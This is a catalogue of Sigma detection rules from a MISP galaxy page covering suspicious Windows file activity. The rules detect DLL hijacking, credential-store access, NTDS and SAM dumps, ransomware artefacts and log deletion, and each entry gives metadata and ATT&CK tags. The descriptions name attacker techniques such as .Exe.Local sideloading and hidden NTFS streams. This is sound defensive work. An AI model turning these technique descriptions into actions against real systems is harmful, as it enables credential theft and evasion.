ADExplorer Writing Complete AD Snapshot Into .dat File

Detects the dual use tool ADExplorer writing a complete AD snapshot into a .dat file. This can be used by attackers to extract data for Bloodhound, usernames for password spraying or use the meta data for social engineering. The snapshot doesn't contain password hashes but there have been cases, where administrators put passwords in the comment field.

Internal MISP references

UUID 0a1255c5-d732-4b62-ac02-b5152d34fb83 which can be used as unique global reference for ADExplorer Writing Complete AD Snapshot Into .dat File in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Arnim Rupp (Nextron Systems), Thomas Patzke
creation_date 2025-07-09
falsepositive ['Legitimate use of ADExplorer by administrators creating .dat snapshots']
filename file_event_win_sysinternals_adexplorer_dump_written.yml
level medium
logsource.category file_event
logsource.product windows
tags ['attack.discovery', 'attack.t1087.002', 'attack.t1069.002', 'attack.t1482']
Related clusters

To see the related clusters, click here.

Potential Privilege Escalation Attempt Via .Exe.Local Technique

Detects potential privilege escalation attempt via the creation of the "*.Exe.Local" folder inside the "System32" directory in order to sideload "comctl32.dll"

Internal MISP references

UUID 07a99744-56ac-40d2-97b7-2095967b0e03 which can be used as unique global reference for Potential Privilege Escalation Attempt Via .Exe.Local Technique in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Nasreddine Bencherchali (Nextron Systems), Subhash P (@pbssubhash)
creation_date 2022-12-16
falsepositive ['Unknown']
filename file_event_win_system32_local_folder_privilege_escalation.yml
level high
logsource.category file_event
logsource.product windows
tags ['attack.defense-evasion', 'attack.persistence', 'attack.privilege-escalation']

Potential Hidden Directory Creation Via NTFS INDEX_ALLOCATION Stream

Detects the creation of hidden file/folder with the "::$index_allocation" stream. Which can be used as a technique to prevent access to folder and files from tooling such as "explorer.exe" and "powershell.exe"

Internal MISP references

UUID a8f866e1-bdd4-425e-a27a-37619238d9c7 which can be used as unique global reference for Potential Hidden Directory Creation Via NTFS INDEX_ALLOCATION Stream in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Scoubi (@ScoubiMtl)
creation_date 2023-10-09
falsepositive ['Unlikely']
filename file_event_win_susp_hidden_dir_index_allocation.yml
level medium
logsource.category file_event
logsource.product windows
tags ['attack.defense-evasion', 'attack.t1564.004']
Related clusters

To see the related clusters, click here.

Suspicious Get-Variable.exe Creation

Get-Variable is a valid PowerShell cmdlet WindowsApps is by default in the path where PowerShell is executed. So when the Get-Variable command is issued on PowerShell execution, the system first looks for the Get-Variable executable in the path and executes the malicious binary instead of looking for the PowerShell cmdlet.

Internal MISP references

UUID 0c3fac91-5627-46e8-a6a8-a0d7b9b8ae1b which can be used as unique global reference for Suspicious Get-Variable.exe Creation in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author frack113
creation_date 2022-04-23
falsepositive ['Unknown']
filename file_event_win_susp_get_variable.yml
level high
logsource.category file_event
logsource.product windows
tags ['attack.privilege-escalation', 'attack.persistence', 'attack.t1546', 'attack.defense-evasion', 'attack.t1027']
Related clusters

To see the related clusters, click here.

WScript or CScript Dropper - File

Detects a file ending in jse, vbe, js, vba, vbs written by cscript.exe or wscript.exe

Internal MISP references

UUID 002bdb95-0cf1-46a6-9e08-d38c128a6127 which can be used as unique global reference for WScript or CScript Dropper - File in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Tim Shelton
creation_date 2022-01-10
falsepositive ['Unknown']
filename file_event_win_cscript_wscript_dropper.yml
level high
logsource.category file_event
logsource.product windows
tags ['attack.execution', 'attack.t1059.005', 'attack.t1059.007']
Related clusters

To see the related clusters, click here.

Suspicious Double Extension Files

Detects dropped files with double extensions, which is often used by malware as a method to abuse the fact that Windows hide default extensions by default.

Internal MISP references

UUID b4926b47-a9d7-434c-b3a0-adc3fa0bd13e which can be used as unique global reference for Suspicious Double Extension Files in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Nasreddine Bencherchali (Nextron Systems), frack113
creation_date 2022-06-19
falsepositive ['Unlikely']
filename file_event_win_susp_double_extension.yml
level high
logsource.category file_event
logsource.product windows
tags ['attack.defense-evasion', 'attack.t1036.007']
Related clusters

To see the related clusters, click here.

Potential Initial Access via DLL Search Order Hijacking

Detects attempts to create a DLL file to a known desktop application dependencies folder such as Slack, Teams or OneDrive and by an unusual process. This may indicate an attempt to load a malicious module via DLL search order hijacking.

Internal MISP references

UUID dbbd9f66-2ed3-4ca2-98a4-6ea985dd1a1c which can be used as unique global reference for Potential Initial Access via DLL Search Order Hijacking in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Tim Rauch (rule), Elastic (idea)
creation_date 2022-10-21
falsepositive ['Unknown']
filename file_event_win_initial_access_dll_search_order_hijacking.yml
level medium
logsource.category file_event
logsource.product windows
tags ['attack.privilege-escalation', 'attack.persistence', 'attack.t1566', 'attack.t1566.001', 'attack.initial-access', 'attack.t1574', 'attack.t1574.001', 'attack.defense-evasion']
Related clusters

To see the related clusters, click here.

Suspicious File Created Via OneNote Application

Detects suspicious files created via the OneNote application. This could indicate a potential malicious ".one"/".onepkg" file was executed as seen being used in malware activity in the wild

Internal MISP references

UUID fcc6d700-68d9-4241-9a1a-06874d621b06 which can be used as unique global reference for Suspicious File Created Via OneNote Application in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Nasreddine Bencherchali (Nextron Systems)
creation_date 2023-02-09
falsepositive ["False positives should be very low with the extensions list cited. Especially if you don't heavily utilize OneNote.", 'Occasional FPs might occur if OneNote is used internally to share different embedded documents']
filename file_event_win_office_onenote_susp_dropped_files.yml
level high
logsource.category file_event
logsource.product windows
tags ['attack.defense-evasion']

Office Macro File Download

Detects the creation of a new office macro files on the system via an application (browser, mail client). This can help identify potential malicious activity, such as the download of macro-enabled documents that could be used for exploitation.

Internal MISP references

UUID 0e29e3a7-1ad8-40aa-b691-9f82ecd33d66 which can be used as unique global reference for Office Macro File Download in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Nasreddine Bencherchali (Nextron Systems)
creation_date 2022-01-23
falsepositive ['Legitimate macro files downloaded from the internet', 'Legitimate macro files sent as attachments via emails']
filename file_event_win_office_macro_files_downloaded.yml
level low
logsource.category file_event
logsource.product windows
tags ['attack.initial-access', 'attack.t1566.001']
Related clusters

To see the related clusters, click here.

HackTool - Powerup Write Hijack DLL

Powerup tool's Write Hijack DLL exploits DLL hijacking for privilege escalation. In it's default mode, it builds a self deleting .bat file which executes malicious command. The detection rule relies on creation of the malicious bat file (debug.bat by default).

Internal MISP references

UUID 602a1f13-c640-4d73-b053-be9a2fa58b96 which can be used as unique global reference for HackTool - Powerup Write Hijack DLL in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Subhash Popuri (@pbssubhash)
creation_date 2021-08-21
falsepositive ['Any powershell script that creates bat files']
filename file_event_win_hktl_powerup_dllhijacking.yml
level high
logsource.category file_event
logsource.product windows
tags ['attack.persistence', 'attack.privilege-escalation', 'attack.defense-evasion', 'attack.t1574.001']
Related clusters

To see the related clusters, click here.

Visual Studio Code Tunnel Remote File Creation

Detects the creation of file by the "node.exe" process in the ".vscode-server" directory. Could be a sign of remote file creation via VsCode tunnel feature

Internal MISP references

UUID 56e05d41-ce99-4ecd-912d-93f019ee0b71 which can be used as unique global reference for Visual Studio Code Tunnel Remote File Creation in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Nasreddine Bencherchali (Nextron Systems)
creation_date 2023-10-25
falsepositive ['Unknown']
filename file_event_win_vscode_tunnel_remote_creation_artefacts.yml
level medium
logsource.category file_event
logsource.product windows
tags ['attack.command-and-control']

EVTX Created In Uncommon Location

Detects the creation of new files with the ".evtx" extension in non-common or non-standard location. This could indicate tampering with default EVTX locations in order to evade security controls or simply exfiltration of event log to search for sensitive information within. Note that backup software and legitimate administrator might perform similar actions during troubleshooting.

Internal MISP references

UUID 65236ec7-ace0-4f0c-82fd-737b04fd4dcb which can be used as unique global reference for EVTX Created In Uncommon Location in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author D3F7A5105
creation_date 2023-01-02
falsepositive ['Administrator or backup activity', 'An unknown bug seems to trigger the Windows "svchost" process to drop EVTX files in the "C:\Windows\Temp" directory in the form "_.evtx". See https://superuser.com/questions/1371229/low-disk-space-after-filling-up-c-windows-temp-with-evtx-and-txt-files']
filename file_event_win_create_evtx_non_common_locations.yml
level medium
logsource.category file_event
logsource.product windows
tags ['attack.defense-evasion', 'attack.t1562.002']
Related clusters

To see the related clusters, click here.

VsCode Powershell Profile Modification

Detects the creation or modification of a vscode related powershell profile which could indicate suspicious activity as the profile can be used as a mean of persistence

Internal MISP references

UUID 3a9fa2ec-30bc-4ebd-b49e-7c9cff225502 which can be used as unique global reference for VsCode Powershell Profile Modification in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Nasreddine Bencherchali (Nextron Systems)
creation_date 2022-08-24
falsepositive ['Legitimate use of the profile by developers or administrators']
filename file_event_win_susp_vscode_powershell_profile.yml
level medium
logsource.category file_event
logsource.product windows
tags ['attack.persistence', 'attack.privilege-escalation', 'attack.t1546.013']
Related clusters

To see the related clusters, click here.

BloodHound Collection Files

Detects default file names outputted by the BloodHound collection tool SharpHound

Internal MISP references

UUID 02773bed-83bf-469f-b7ff-e676e7d78bab which can be used as unique global reference for BloodHound Collection Files in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author C.J. May
creation_date 2022-08-09
falsepositive ['Some false positives may arise in some environment and this may require some tuning. Add additional filters or reduce level depending on the level of noise']
filename file_event_win_bloodhound_collection.yml
level high
logsource.category file_event
logsource.product windows
tags ['attack.discovery', 'attack.t1087.001', 'attack.t1087.002', 'attack.t1482', 'attack.t1069.001', 'attack.t1069.002', 'attack.execution', 'attack.t1059.001']
Related clusters

To see the related clusters, click here.

HackTool - NPPSpy Hacktool Usage

Detects the use of NPPSpy hacktool that stores cleartext passwords of users that logged in to a local file

Internal MISP references

UUID cad1fe90-2406-44dc-bd03-59d0b58fe722 which can be used as unique global reference for HackTool - NPPSpy Hacktool Usage in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Florian Roth (Nextron Systems)
creation_date 2021-11-29
falsepositive ['Unknown']
filename file_event_win_hktl_nppspy.yml
level high
logsource.category file_event
logsource.product windows
tags ['attack.credential-access']

Suspicious Creation TXT File in User Desktop

Ransomware create txt file in the user Desktop

Internal MISP references

UUID caf02a0a-1e1c-4552-9b48-5e070bd88d11 which can be used as unique global reference for Suspicious Creation TXT File in User Desktop in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author frack113
creation_date 2021-12-26
falsepositive ['Unknown']
filename file_event_win_susp_desktop_txt.yml
level high
logsource.category file_event
logsource.product windows
tags ['attack.impact', 'attack.t1486']
Related clusters

To see the related clusters, click here.

GoToAssist Temporary Installation Artefact

An adversary may use legitimate desktop support and remote access software, such as Team Viewer, Go2Assist, LogMein, AmmyyAdmin, etc, to establish an interactive command and control channel to target systems within networks. These services are commonly used as legitimate technical support software, and may be allowed by application control within a target environment. Remote access tools like VNC, Ammyy, and Teamviewer are used frequently when compared with other legitimate software commonly used by adversaries. (Citation: Symantec Living off the Land)

Internal MISP references

UUID 5d756aee-ad3e-4306-ad95-cb1abec48de2 which can be used as unique global reference for GoToAssist Temporary Installation Artefact in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author frack113
creation_date 2022-02-13
falsepositive ['Legitimate use']
filename file_event_win_gotoopener_artefact.yml
level medium
logsource.category file_event
logsource.product windows
tags ['attack.command-and-control', 'attack.t1219.002']
Related clusters

To see the related clusters, click here.

Creation Of Non-Existent System DLL

Detects the creation of system DLLs that are usually not present on the system (or at least not in system directories). Usually this technique is used to achieve DLL hijacking.

Internal MISP references

UUID df6ecb8b-7822-4f4b-b412-08f524b4576c which can be used as unique global reference for Creation Of Non-Existent System DLL in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Nasreddine Bencherchali (Nextron Systems), fornotes
creation_date 2022-12-01
falsepositive ['Unknown']
filename file_event_win_create_non_existent_dlls.yml
level medium
logsource.category file_event
logsource.product windows
tags ['attack.defense-evasion', 'attack.persistence', 'attack.privilege-escalation', 'attack.t1574.001']
Related clusters

To see the related clusters, click here.

Suspicious File Created In PerfLogs

Detects suspicious file based on their extension being created in "C:\PerfLogs\". Note that this directory mostly contains ".etl" files

Internal MISP references

UUID bbb7e38c-0b41-4a11-b306-d2a457b7ac2b which can be used as unique global reference for Suspicious File Created In PerfLogs in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Nasreddine Bencherchali (Nextron Systems)
creation_date 2023-05-05
falsepositive ['Unlikely']
filename file_event_win_perflogs_susp_files.yml
level medium
logsource.category file_event
logsource.product windows
tags ['attack.execution', 'attack.t1059']
Related clusters

To see the related clusters, click here.

Remote Access Tool - ScreenConnect Temporary File

Detects the creation of files in a specific location by ScreenConnect RMM. ScreenConnect has feature to remotely execute binaries on a target machine. These binaries will be dropped to ":\Users\\Documents\ConnectWiseControl\Temp\" before execution.

Internal MISP references

UUID 0afecb6e-6223-4a82-99fb-bf5b981e92a5 which can be used as unique global reference for Remote Access Tool - ScreenConnect Temporary File in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Ali Alwashali
creation_date 2023-10-10
falsepositive ['Legitimate use of ScreenConnect']
filename file_event_win_remote_access_tools_screenconnect_remote_file.yml
level low
logsource.category file_event
logsource.product windows
tags ['attack.execution', 'attack.t1059.003']
Related clusters

To see the related clusters, click here.

NTDS Exfiltration Filename Patterns

Detects creation of files with specific name patterns seen used in various tools that export the NTDS.DIT for exfiltration.

Internal MISP references

UUID 3a8da4e0-36c1-40d2-8b29-b3e890d5172a which can be used as unique global reference for NTDS Exfiltration Filename Patterns in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Florian Roth (Nextron Systems)
creation_date 2022-03-11
falsepositive ['Unknown']
filename file_event_win_ntds_exfil_tools.yml
level high
logsource.category file_event
logsource.product windows
tags ['attack.credential-access', 'attack.t1003.003']
Related clusters

To see the related clusters, click here.

Potential SAM Database Dump

Detects the creation of files that look like exports of the local SAM (Security Account Manager)

Internal MISP references

UUID 4e87b8e2-2ee9-4b2a-a715-4727d297ece0 which can be used as unique global reference for Potential SAM Database Dump in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Florian Roth (Nextron Systems)
creation_date 2022-02-11
falsepositive ['Rare cases of administrative activity']
filename file_event_win_sam_dump.yml
level high
logsource.category file_event
logsource.product windows
tags ['attack.credential-access', 'attack.t1003.002']
Related clusters

To see the related clusters, click here.

Suspicious Appended Extension

Detects file renames where the target filename uses an uncommon double extension. Could indicate potential ransomware activity renaming files and adding a custom extension to the encrypted files, such as ".jpg.crypted", ".docx.locky", etc.

Internal MISP references

UUID e3f673b3-65d1-4d80-9146-466f8b63fa99 which can be used as unique global reference for Suspicious Appended Extension in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author frack113
creation_date 2022-07-16
falsepositive ['Backup software']
filename file_rename_win_ransomware.yml
level medium
logsource.category file_rename
logsource.product windows
tags ['attack.impact', 'attack.t1486']
Related clusters

To see the related clusters, click here.

Access To Windows DPAPI Master Keys By Uncommon Applications

Detects file access requests to the the Windows Data Protection API Master keys by an uncommon application. This can be a sign of credential stealing. Example case would be usage of mimikatz "dpapi::masterkey" function

Internal MISP references

UUID 46612ae6-86be-4802-bc07-39b59feb1309 which can be used as unique global reference for Access To Windows DPAPI Master Keys By Uncommon Applications in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Nasreddine Bencherchali (Nextron Systems)
creation_date 2022-10-17
falsepositive ['Unknown']
filename file_access_win_susp_dpapi_master_key_access.yml
level medium
logsource.category file_access
logsource.product windows
tags ['attack.credential-access', 'attack.t1555.004']
Related clusters

To see the related clusters, click here.

Credential Manager Access By Uncommon Applications

Detects suspicious processes based on name and location that access the windows credential manager and vault. Which can be a sign of credential stealing. Example case would be usage of mimikatz "dpapi::cred" function

Internal MISP references

UUID 407aecb1-e762-4acf-8c7b-d087bcff3bb6 which can be used as unique global reference for Credential Manager Access By Uncommon Applications in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Nasreddine Bencherchali (Nextron Systems)
creation_date 2022-10-11
falsepositive ['Legitimate software installed by the users for example in the "AppData" directory may access these files (for any reason).']
filename file_access_win_susp_credential_manager_access.yml
level medium
logsource.category file_access
logsource.product windows
tags ['attack.t1003', 'attack.credential-access']
Related clusters

To see the related clusters, click here.

Access To Potentially Sensitive Sysvol Files By Uncommon Applications

Detects file access requests to potentially sensitive files hosted on the Windows Sysvol share.

Internal MISP references

UUID d51694fe-484a-46ac-92d6-969e76d60d10 which can be used as unique global reference for Access To Potentially Sensitive Sysvol Files By Uncommon Applications in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author frack113
creation_date 2023-12-21
falsepositive ['Unknown']
filename file_access_win_susp_gpo_files.yml
level medium
logsource.category file_access
logsource.product windows
tags ['attack.credential-access', 'attack.t1552.006']
Related clusters

To see the related clusters, click here.

Access To Crypto Currency Wallets By Uncommon Applications

Detects file access requests to crypto currency files by uncommon processes. Could indicate potential attempt of crypto currency wallet stealing.

Internal MISP references

UUID f41b0311-44f9-44f0-816d-dd45e39d4bc8 which can be used as unique global reference for Access To Crypto Currency Wallets By Uncommon Applications in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author X__Junior (Nextron Systems)
creation_date 2024-07-29
falsepositive ['Antivirus, Anti-Spyware, Anti-Malware Software', 'Backup software', 'Legitimate software installed on partitions other than "C:\"', 'Searching software such as "everything.exe"']
filename file_access_win_susp_crypto_currency_wallets.yml
level medium
logsource.category file_access
logsource.product windows
tags ['attack.t1003', 'attack.credential-access']
Related clusters

To see the related clusters, click here.

Microsoft Teams Sensitive File Access By Uncommon Applications

Detects file access attempts to sensitive Microsoft teams files (leveldb, cookies) by an uncommon process.

Internal MISP references

UUID 65744385-8541-44a6-8630-ffc824d7d4cc which can be used as unique global reference for Microsoft Teams Sensitive File Access By Uncommon Applications in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author @SerkinValery
creation_date 2024-07-22
falsepositive ['Unknown']
filename file_access_win_teams_sensitive_files.yml
level medium
logsource.category file_access
logsource.product windows
tags ['attack.credential-access', 'attack.t1528']
Related clusters

To see the related clusters, click here.

Suspicious File Access to Browser Credential Storage

Detects file access to browser credential storage paths by non-browser processes, which may indicate credential access attempts. Adversaries may attempt to access browser credential storage to extract sensitive information such as usernames and passwords or cookies. This behavior is often commonly observed in credential stealing malware.

Internal MISP references

UUID a1dfd976-4852-41d4-9507-dc6590a3ccd0 which can be used as unique global reference for Suspicious File Access to Browser Credential Storage in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author frack113, X__Junior (Nextron Systems), Swachchhanda Shrawan Poudel (Nextron Systems), Parth-FourCore
creation_date 2025-05-22
falsepositive ['Antivirus, Anti-Spyware, Anti-Malware Software', 'Legitimate software accessing browser data for synchronization or backup purposes.', 'Legitimate software installed on partitions other than "C:\"']
filename file_access_win_susp_process_access_browser_cred_files.yml
level low
logsource.category file_access
logsource.product windows
tags ['attack.credential-access', 'attack.t1555.003', 'attack.discovery', 'attack.t1217']
Related clusters

To see the related clusters, click here.

Access To Windows Credential History File By Uncommon Applications

Detects file access requests to the Windows Credential History File by an uncommon application. This can be a sign of credential stealing. Example case would be usage of mimikatz "dpapi::credhist" function

Internal MISP references

UUID 7a2a22ea-a203-4cd3-9abf-20eb1c5c6cd2 which can be used as unique global reference for Access To Windows Credential History File By Uncommon Applications in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Nasreddine Bencherchali (Nextron Systems)
creation_date 2022-10-17
falsepositive ['Unknown']
filename file_access_win_susp_credhist.yml
level medium
logsource.category file_access
logsource.product windows
tags ['attack.credential-access', 'attack.t1555.004']
Related clusters

To see the related clusters, click here.

File Creation Date Changed to Another Year

Attackers may change the file creation time of a backdoor to make it look like it was installed with the operating system. Note that many processes legitimately change the creation time of a file; it does not necessarily indicate malicious activity.

Internal MISP references

UUID 558eebe5-f2ba-4104-b339-36f7902bcc1a which can be used as unique global reference for File Creation Date Changed to Another Year in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author frack113, Florian Roth (Nextron Systems)
creation_date 2022-08-12
falsepositive ['Changes made to or by the local NTP service']
filename file_change_win_2022_timestomping.yml
level high
logsource.category file_change
logsource.product windows
tags ['attack.t1070.006', 'attack.defense-evasion']
Related clusters

To see the related clusters, click here.

Unusual File Modification by dns.exe

Detects an unexpected file being modified by dns.exe which my indicate activity related to remote code execution or other forms of exploitation as seen in CVE-2020-1350 (SigRed)

Internal MISP references

UUID 9f383dc0-fdeb-4d56-acbc-9f9f4f8f20f3 which can be used as unique global reference for Unusual File Modification by dns.exe in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Tim Rauch (Nextron Systems), Elastic (idea)
creation_date 2022-09-27
falsepositive ['Unknown']
filename file_change_win_unusual_modification_by_dns_exe.yml
level high
logsource.category file_change
logsource.product windows
tags ['attack.persistence', 'attack.initial-access', 'attack.t1133']
Related clusters

To see the related clusters, click here.

Prefetch File Deleted

Detects the deletion of a prefetch file which may indicate an attempt to destroy forensic evidence

Internal MISP references

UUID 0a1f9d29-6465-4776-b091-7f43b26e4c89 which can be used as unique global reference for Prefetch File Deleted in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Cedric MAURUGEON
creation_date 2021-09-29
falsepositive ['Unknown']
filename file_delete_win_delete_prefetch.yml
level high
logsource.category file_delete
logsource.product windows
tags ['attack.defense-evasion', 'attack.t1070.004']
Related clusters

To see the related clusters, click here.

Backup Files Deleted

Detects deletion of files with extensions often used for backup files. Adversaries may delete or remove built-in operating system data and turn off services designed to aid in the recovery of a corrupted system to prevent recovery.

Internal MISP references

UUID 06125661-3814-4e03-bfa2-1e4411c60ac3 which can be used as unique global reference for Backup Files Deleted in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author frack113
creation_date 2022-01-02
falsepositive ['Legitimate usage']
filename file_delete_win_delete_backup_file.yml
level medium
logsource.category file_delete
logsource.product windows
tags ['attack.impact', 'attack.t1490']
Related clusters

To see the related clusters, click here.

Unusual File Deletion by Dns.exe

Detects an unexpected file being deleted by dns.exe which my indicate activity related to remote code execution or other forms of exploitation as seen in CVE-2020-1350 (SigRed)

Internal MISP references

UUID 8f0b1fb1-9bd4-4e74-8cdf-a8de4d2adfd0 which can be used as unique global reference for Unusual File Deletion by Dns.exe in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Tim Rauch (Nextron Systems), Elastic (idea)
creation_date 2022-09-27
falsepositive ['Unknown']
filename file_delete_win_unusual_deletion_by_dns_exe.yml
level high
logsource.category file_delete
logsource.product windows
tags ['attack.persistence', 'attack.initial-access', 'attack.t1133']
Related clusters

To see the related clusters, click here.

Process Deletion of Its Own Executable

Detects the deletion of a process's executable by itself. This is usually not possible without workarounds and may be used by malware to hide its traces.

Internal MISP references

UUID f01d1f70-cd41-42ec-9c0b-26dd9c22bf29 which can be used as unique global reference for Process Deletion of Its Own Executable in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Max Altgelt (Nextron Systems)
creation_date 2024-09-03
falsepositive ['Some false positives are to be expected from uninstallers.']
filename file_delete_win_delete_own_image.yml
level medium
logsource.category file_delete
logsource.product windows
tags ['attack.defense-evasion']

IIS WebServer Access Logs Deleted

Detects the deletion of IIS WebServer access logs which may indicate an attempt to destroy forensic evidence

Internal MISP references

UUID 3eb8c339-a765-48cc-a150-4364c04652bf which can be used as unique global reference for IIS WebServer Access Logs Deleted in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Tim Rauch (Nextron Systems), Nasreddine Bencherchali (Nextron Systems)
creation_date 2022-09-16
falsepositive ['During uninstallation of the IIS service', 'During log rotation']
filename file_delete_win_delete_iis_access_logs.yml
level medium
logsource.category file_delete
logsource.product windows
tags ['attack.defense-evasion', 'attack.t1070']
Related clusters

To see the related clusters, click here.

ADS Zone.Identifier Deleted By Uncommon Application

Detects the deletion of the "Zone.Identifier" ADS by an uncommon process. Attackers can leverage this in order to bypass security restrictions that make use of the ADS such as Microsoft Office apps.

Internal MISP references

UUID 3109530e-ab47-4cc6-a953-cac5ebcc93ae which can be used as unique global reference for ADS Zone.Identifier Deleted By Uncommon Application in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Nasreddine Bencherchali (Nextron Systems)
creation_date 2023-09-04
falsepositive ['Other third party applications not listed.']
filename file_delete_win_zone_identifier_ads_uncommon.yml
level medium
logsource.category file_delete
logsource.product windows
tags ['attack.defense-evasion', 'attack.t1070.004']
Related clusters

To see the related clusters, click here.

Exchange PowerShell Cmdlet History Deleted

Detects the deletion of the Exchange PowerShell cmdlet History logs which may indicate an attempt to destroy forensic evidence

Internal MISP references

UUID a55349d8-9588-4c5a-8e3b-1925fe2a4ffe which can be used as unique global reference for Exchange PowerShell Cmdlet History Deleted in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Nasreddine Bencherchali (Nextron Systems)
creation_date 2022-10-26
falsepositive ['Possible FP during log rotation']
filename file_delete_win_delete_exchange_powershell_logs.yml
level high
logsource.category file_delete
logsource.product windows
tags ['attack.defense-evasion', 'attack.t1070']
Related clusters

To see the related clusters, click here.

TeamViewer Log File Deleted

Detects the deletion of the TeamViewer log files which may indicate an attempt to destroy forensic evidence

Internal MISP references

UUID b1decb61-ed83-4339-8e95-53ea51901720 which can be used as unique global reference for TeamViewer Log File Deleted in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author frack113
creation_date 2022-01-16
falsepositive ['Unknown']
filename file_delete_win_delete_teamviewer_logs.yml
level low
logsource.category file_delete
logsource.product windows
tags ['attack.defense-evasion', 'attack.t1070.004']
Related clusters

To see the related clusters, click here.

EventLog EVTX File Deleted

Detects the deletion of the event log files which may indicate an attempt to destroy forensic evidence

Internal MISP references

UUID 63c779ba-f638-40a0-a593-ddd45e8b1ddc which can be used as unique global reference for EventLog EVTX File Deleted in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Nasreddine Bencherchali (Nextron Systems)
creation_date 2023-02-15
falsepositive ['Unknown']
filename file_delete_win_delete_event_log_files.yml
level medium
logsource.category file_delete
logsource.product windows
tags ['attack.defense-evasion', 'attack.t1070']
Related clusters

To see the related clusters, click here.

Tomcat WebServer Logs Deleted

Detects the deletion of tomcat WebServer logs which may indicate an attempt to destroy forensic evidence

Internal MISP references

UUID 270185ff-5f50-4d6d-a27f-24c3b8c9fef8 which can be used as unique global reference for Tomcat WebServer Logs Deleted in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Nasreddine Bencherchali (Nextron Systems)
creation_date 2023-02-16
falsepositive ['During uninstallation of the tomcat server', 'During log rotation']
filename file_delete_win_delete_tomcat_logs.yml
level medium
logsource.category file_delete
logsource.product windows
tags ['attack.defense-evasion', 'attack.t1070']
Related clusters

To see the related clusters, click here.

File Deleted Via Sysinternals SDelete

Detects the deletion of files by the Sysinternals SDelete utility. It looks for the common name pattern used to rename files.

Internal MISP references

UUID 6ddab845-b1b8-49c2-bbf7-1a11967f64bc which can be used as unique global reference for File Deleted Via Sysinternals SDelete in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)
creation_date 2020-05-02
falsepositive ['Legitimate usage']
filename file_delete_win_sysinternals_sdelete_file_deletion.yml
level medium
logsource.category file_delete
logsource.product windows
tags ['attack.defense-evasion', 'attack.t1070.004']
Related clusters

To see the related clusters, click here.

PowerShell Console History Logs Deleted

Detects the deletion of the PowerShell console History logs which may indicate an attempt to destroy forensic evidence

Internal MISP references

UUID ff301988-c231-4bd0-834c-ac9d73b86586 which can be used as unique global reference for PowerShell Console History Logs Deleted in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Nasreddine Bencherchali (Nextron Systems)
creation_date 2023-02-15
falsepositive ['Unknown']
filename file_delete_win_delete_powershell_command_history.yml
level medium
logsource.category file_delete
logsource.product windows
tags ['attack.defense-evasion', 'attack.t1070']
Related clusters

To see the related clusters, click here.

Potentially Suspicious Self Extraction Directive File Created

Detects the creation of a binary file with the ".sed" extension. The ".sed" extension stand for Self Extraction Directive files. These files are used by the "iexpress.exe" utility in order to create self extracting packages. Attackers were seen abusing this utility and creating PE files with embedded ".sed" entries. Usually ".sed" files are simple ini files and not PE binaries.

Internal MISP references

UUID ab90dab8-c7da-4010-9193-563528cfa347 which can be used as unique global reference for Potentially Suspicious Self Extraction Directive File Created in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Joseliyo Sanchez, @Joseliyo_Jstnk
creation_date 2024-02-05
falsepositive ['Unknown']
filename file_executable_detected_win_susp_embeded_sed_file.yml
level medium
logsource.category file_executable_detected
logsource.product windows
tags ['attack.defense-evasion', 'attack.t1218']
Related clusters

To see the related clusters, click here.

DLL Execution Via Register-cimprovider.exe

Detects using register-cimprovider.exe to execute arbitrary dll file.

Internal MISP references

UUID a2910908-e86f-4687-aeba-76a5f996e652 which can be used as unique global reference for DLL Execution Via Register-cimprovider.exe in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
